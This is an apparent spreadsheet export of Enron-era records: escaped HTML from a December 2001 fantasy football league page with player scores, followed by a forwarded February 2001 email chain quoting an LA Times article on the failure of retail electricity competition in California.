&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/23&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=pro-summary&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;pro_team=14&amp;"&gt;&lt;B&gt;Kansas City Chiefs&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed safety Shaunard Harris from the practice squad. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE BGCOLOR=#e0e6df WIDTH=100% CELLPADDING=1 CELLSPACING=0 BORDER=0&gt;&lt;TR&gt;&lt;TD ALIGN=middle&gt;&lt;FONT SIZE=2 COLOR="#000000" FACE="Arial, Helvetica"&gt;&lt;B&gt;12/21&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;NFL&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Fined Minnesota &lt;A HREF=players?league=ene&amp;owner=45547.3&amp;key=16&gt;Vikings&lt;/A&gt; receiver &lt;A HREF=players?league=ene&amp;owner=45547.3&amp;key=12576&gt;Randy Moss&lt;/A&gt; &amp;#36;10,000 for a repeated taunting offense in a December 16 game against Detroit; fined Kansas City &lt;A HREF=players?league=ene&amp;owner=45547.3&amp;key=14&gt;Chiefs&lt;/A&gt; linebacker Donnie Edwards &amp;#36;12,500 for an unnecessary roughness penalty in a December 16 game against Denver. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Transactions,&amp;nbsp;View&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CENTER&gt;&lt;TABLE BGCOLOR="#bfbfbf" BORDER=2 CELLSPACING=0 CELLPADDING=0&gt;&lt;TR&gt;&lt;TD&gt;_x000D_
&lt;TABLE BORDER=0 CELLSPACING=0 CELLPADDING=2&gt;_x000D_
&lt;TR BGCOLOR=#00007f&gt;_x000D_
&lt;TD COLSPAN=3&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLSPACING=0 CELLPADDING=0&gt;_x000D_
&lt;TR&gt;&lt;TD VALIGN=middle ALIGN=left&gt;&lt;IMG HSPACE=2 VSPACE=2 WIDTH=14 HEIGHT=14 SRC="http://images.commissioner.com/images/eye_device_tiny.gif"&gt;&amp;nbsp;&lt;FONT SIZE=2&gt;&lt;FONT COLOR="#ffffff"&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;Warning&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;_x000D_
&lt;/TD&gt;_x000D_
&lt;TD ALIGN=right VALIGN=middle&gt;_x000D_
&amp;nbsp;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=home&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;"&gt;&lt;IMG BORDER=0 ALIGN=absmiddle HSPACE=2 SRC="http://images.commissioner.com/images/wizard/win95/x.gif"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;_x000D_
&lt;TD WIDTH=25&gt;&lt;BR&gt;&lt;/TD&gt;_x000D_
&lt;TD WIDTH=400 HEIGHT=120&gt;&lt;FONT FACE="Arial, Helvetica" SIZE=2&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD WIDTH=10&gt;&lt;/TD&gt;&lt;TD WIDTH=60&gt;&lt;IMG SRC="http://images.commissioner.com/images/exclamation.gif"&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;There are no League Transactions at this time.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/FONT&gt;&lt;/TD&gt;_x000D_
&lt;TD WIDTH=25&gt;&lt;BR&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;_x000D_
&lt;TR&gt;_x000D_
&lt;TD COLSPAN=4 HEIGHT=50 ALIGN=middle&gt;_x000D_
&lt;HR&gt;_x000D_
&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/home&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;"&gt;&lt;IMG BORDER=0 SRC="http://images.commissioner.com/images/wizard/OK.gif"&gt;&lt;/A&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;/CENTER&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Schedule,&amp;nbsp;Breakdown&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH=100%&gt;&lt;TR&gt;&lt;TD VALIGN=top WIDTH=48%&gt;&lt;FONT SIZE=3&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;Rocks&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;TABLE  BGCOLOR="#f0f0f0" WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=1&gt;&lt;TR BGCOLOR="#e0e6df"&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Player&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Pos&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Points&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1069&amp;week=15&amp;"&gt;McNair, Steve&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;12.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1094&amp;week=15&amp;"&gt;Smith, Emmitt&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;13.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1151&amp;week=15&amp;"&gt;Watters, Ricky&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1227&amp;week=15&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1201&amp;week=15&amp;"&gt;Ismail, Raghib&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1329&amp;week=15&amp;"&gt;Sharpe, Shannon&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;TE&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;3.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1385&amp;week=15&amp;"&gt;Conway, Brett&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;K&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;7.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=30&amp;week=15&amp;"&gt;Redskins&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;DT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;4.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 BGCOLOR="#e0e6df" COLSPAN=3&gt;&lt;IMG WIDTH=1 HEIGHT=1 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;B&gt;TOTAL&lt;/B&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;&lt;B&gt;39.0&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 BGCOLOR="#e0e6df" COLSPAN=3&gt;&lt;IMG WIDTH=1 HEIGHT=1 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1162&amp;week=15&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1119&amp;week=15&amp;"&gt;Bennett, Donnell&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;1.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=12204&amp;week=15&amp;"&gt;Batch, Charlie&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=133260&amp;week=15&amp;"&gt;Couch, Tim&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;16.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1499&amp;week=15&amp;"&gt;Davis, Tyrone&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;TE&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;1.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1593&amp;week=15&amp;"&gt;Schroeder, Bill&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;1.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;/TABLE&gt;&lt;BR&gt;&lt;/TD&gt;&lt;TD WIDTH=4%&gt;&lt;IMG HSPACE=5 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;TD VALIGN=top WIDTH=48%&gt;&lt;FONT SIZE=3&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;at Eric Bass&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;TABLE  BGCOLOR="#f0f0f0" WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=1&gt;&lt;TR BGCOLOR="#e0e6df"&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Player&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Pos&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=middle&gt;&lt;FONT COLOR=#000000&gt;&lt;B&gt;&lt;FONT SIZE=2&gt;&lt;FONT FACE="Arial, Helvetica"&gt;Points&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1035&amp;week=15&amp;"&gt;Grbac, Elvis&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;QB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;9.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1128&amp;week=15&amp;"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1820&amp;week=15&amp;"&gt;Allen, James&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;RB&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;0.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1231&amp;week=15&amp;"&gt;Harrison, Marvin&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;18.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=12431&amp;week=15&amp;"&gt;Hayes, Donald&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;7.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1511&amp;week=15&amp;"&gt;Horn, Joe&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;WR&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;17.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=1389&amp;week=15&amp;"&gt;Nedney, Joe&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;K&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;7.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elink?script=/mp/players&amp;league=ene&amp;owner=45547.3&amp;random=594&amp;key=3&amp;week=15&amp;"&gt;Ravens&lt;/A&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;DT&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;17.0&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 BGCOLOR="#e0e6df" COLSPAN=3&gt;&lt;IMG WIDTH=1 HEIGHT=1 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;B&gt;TOTAL&lt;/B&gt;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;&amp;nbsp;&lt;/TD&gt;&lt;TD class=TD2 ALIGN=right&gt;&lt;B&gt;75.0&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#eaeaea &gt;&lt;TD class=TD2 BGCOLOR="#e0e6df" COLSPAN=3&gt;&lt;IMG WIDTH=1 HEIGHT=1 SRC="http://images.commissioner.com/images/dot_clear.gif"&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
&lt;TR BGCOLOR=#f0f0f0 &gt;&lt;TD class=TD2 &gt;&lt;A HREF="http://football292.fantasy.sportsline.com/mp/elin</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 14:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>RE: LA Times story</t>
  </si>
  <si>
    <t xml:space="preserve">Good story on retail -- as a direct result of ARM's hiring of Edelman.  Some _x000D_
good Lay and Robert Michaels' quotes._x000D_
----- Forwarded by Susan J Mara/NA/Enron on 02/07/2001 10:42 PM -----_x000D_
_x000D_
	"Counihan, Rick" &lt;rick.counihan@greenmountain.com&gt;_x000D_
	02/07/2001 01:09 PM_x000D_
		 _x000D_
		 To: "'Allen, Stevan'" &lt;stevan.allen@edelman.com&gt;, "Counihan, Rick" _x000D_
&lt;rick.counihan@greenmountain.com&gt;, "Aaron Thomas (E-mail)" _x000D_
&lt;athomas@newenergy.com&gt;, "'ARM List Serve'" &lt;Arm@phaser.com&gt;_x000D_
		 cc: "Warner, Jami" &lt;jami.warner@edelman.com&gt;, "Beiser, Megan" _x000D_
&lt;Megan.Beiser@edelman.com&gt;, "Fairchild, Tracy" &lt;tracy.fairchild@edelman.com&gt;_x000D_
		 Subject: RE: LA Times story_x000D_
_x000D_
This story is fantastic!!  It is the best single piece I have seen on the_x000D_
retail market in California and it is in the newspaper of record.  I think_x000D_
we should make copies and hand them out in our press packets and all_x000D_
meetings we have.  I think this is a concrete example of a payoff from_x000D_
working with Edelman._x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Allen, Stevan [mailto:stevan.allen@edelman.com]_x000D_
Sent: Wednesday, February 07, 2001 9:31 AM_x000D_
To: 'Rick. Counihan (E-mail); Aaron Thomas (E-mail)_x000D_
Cc: Warner, Jami; Beiser, Megan; Fairchild, Tracy_x000D_
Subject: LA Times story_x000D_
_x000D_
_x000D_
_x000D_
http://www.latimes.com/business/reports/power/lat_retail010207.htm_x000D_
_x000D_
This piece ran front page of this morning's LA Times. It refers to provision_x000D_
of AB1X we are concerned about. Also, Enron gets a lot of attention. I will_x000D_
have this forwarded to the entire team later this morning. Thanks. _x000D_
_x000D_
Stevan_x000D_
_x000D_
PS - Bryson is having a news conference this morning in Sac. Will keep you_x000D_
posted._x000D_
_x000D_
Deregulation Didn't Foster Competition _x000D_
_x000D_
By NICHOLAS RICCARDI and STEVE BERRY, Times Staff Writers _x000D_
_x000D_
The way people scrambled for a stake in California's power market three_x000D_
years ago, you'd have thought it was the second coming of the Gold Rush._x000D_
Politicians and free marketers boasted that they were freeing millions of_x000D_
customers from their monopolistic utilities so they could shop for cheaper_x000D_
electricity. The state ordered an $87-million publicity campaign, promising_x000D_
a brave new energy world bustling with competition._x000D_
But those dreams of capitalism unleashed never materialized, dashed by_x000D_
provisions in the 1996 deregulation law that effectively undermined_x000D_
competition and gave the utilities a substantial edge over newcomers. In the_x000D_
end, only 1.7% of the utilities' residential users switched to other_x000D_
providers, many opting to pay more for "green" energy._x000D_
Although the chaos swirling around California's electricity crisis has_x000D_
chiefly focused on soaring wholesale prices, the virtual absence of_x000D_
competition at the consumer level has played a key role in deregulation's_x000D_
undoing._x000D_
Had competition among retailers flourished, garnering the millions of_x000D_
customers deregulators expected, prices might never have reached today's_x000D_
unprecedented peaks and the turmoil might have been tempered, economists and_x000D_
retailers say. _x000D_
Retail competition "would not have prevented a crisis, but it would have_x000D_
toned it down," said Richard Counihan, spokesman for Green Mountain Energy,_x000D_
which has returned most of its 50,000 customers to the utilities' ranks._x000D_
Now even the prospect of competition is gone. A measure enacted by the_x000D_
Legislature last week, which made state government the biggest electricity_x000D_
buyer in California, suspended further retail competition, preventing anyone_x000D_
from underbidding the state._x000D_
"That buries us," said Tony Wayne, president of UtiliSource of Brea, which,_x000D_
under the new law, can keep its relatively small number of customers but is_x000D_
barred from entering into new contracts._x000D_
Few thought it would come to this._x000D_
_x000D_
High Hopes Collide With Reality_x000D_
Almost 300 firms registered with the state to sell electricity to consumers._x000D_
Many of them, quick-buck hucksters or small-time operations, were scared off_x000D_
by background checks, fingerprinting and the $25,000 deposit required to_x000D_
enter the market._x000D_
But then there were the likes of giant Enron Corp., which predicted that the_x000D_
new market would pull 700,000 customers from the utilities in the first few_x000D_
weeks. Another firm deployed 400 salespeople, nabbing residential and_x000D_
business prospects by the thousands._x000D_
They quickly discovered that the structure of California's landmark_x000D_
deregulation effort erected protective barriers preventing most retailers_x000D_
from beating the prices of the big three utilities--Southern California_x000D_
Edison, Pacific Gas &amp; Electric and San Diego Gas &amp; Electric._x000D_
For example, deregulation law allowed the utilities to keep their 9 million_x000D_
customers until each took the initiative to switch. Any ratepayer who used a_x000D_
moderate amount of energy and wanted to change companies had to pay $600 for_x000D_
a new meter--unless the retailer wanted to eat the cost itself._x000D_
In contrast, Pennsylvania, where deregulation has been more successful than_x000D_
in California, requires most of its utilities to surrender some of their_x000D_
customers. Last year, 300,000 customers of one utility were auctioned off to_x000D_
the retailer who could promise them the most savings. All together, close to_x000D_
1 million customers have switched from utilities to retailers, with savings_x000D_
estimates ranging from a few dollars to $15 per month._x000D_
In California, the next barrier was expressly designed by deregulation_x000D_
architects to keep new retailers at bay, at least temporarily._x000D_
Before throwing utilities into a free-for-all, lawmakers felt obligated to_x000D_
give them time to pay off debts that would hurt their ability to offer_x000D_
competitive prices. The Legislature froze customer prices at 1996 levels,_x000D_
well above what the utilities were then paying for electricity. The_x000D_
difference would be used to pay their debts._x000D_
The hitch for prospective retailers was that their customers--like those_x000D_
remaining with utilities--would be charged the extra amount too. That_x000D_
seriously hurt the retailers' ability to shave prices for their customers_x000D_
without taking a hit themselves._x000D_
Utility executives say the so-called competition transition charge_x000D_
accomplished its intent: providing some protection against new players until_x000D_
the utilities could shed their debt and compete on an even field._x000D_
According to those executives, the plan went awry when wholesale electricity_x000D_
prices soared before the special debt charge was lifted and competition had_x000D_
a chance to flourish._x000D_
"We haven't had enough time for this market to work," said Denise Grant,_x000D_
director of the Edison division that works with retailers. She said Edison_x000D_
expected to lose 150,000 customers annually--a far cry from what has_x000D_
happened._x000D_
Retailers say they faced other obstacles that seemed designed to help the_x000D_
utilities keep as many of their customers as possible._x000D_
One of the biggest was a newly created energy marketplace called the Power_x000D_
Exchange._x000D_
Under the exchange's rules, all buyers--little guys with a few hundred_x000D_
customers and mammoth utilities with millions--paid the same price for_x000D_
electricity. Once again, retailers were stymied in their search for ways to_x000D_
cut their customers' bills._x000D_
Retailers had no place else to shop for energy because suppliers could make_x000D_
more money selling in high volume to billion-dollar utilities on the Power_x000D_
Exchange, rather than cutting small deals with upstart companies._x000D_
Wayne, the president of UtiliSource, learned the hard way. He was peddling_x000D_
electricity in California in early 1997, before the state created the Power_x000D_
Exchange. After arranging a good, but informal, deal with a Washington_x000D_
generator, he sent out hundreds of salespeople, took to the road himself and_x000D_
soon cornered 10,000 customers._x000D_
But the birth of the exchange caused the death of his deal, Wayne said. The_x000D_
generators pulled out when they realized how much money they could make_x000D_
selling on the open market._x000D_
"That was an oh-my-god. They said, 'Why should we give you a discount when_x000D_
we can sell it to the Power Exchange ourselves?' " he said._x000D_
Retailers say the state protects the utilities in subtler but no less_x000D_
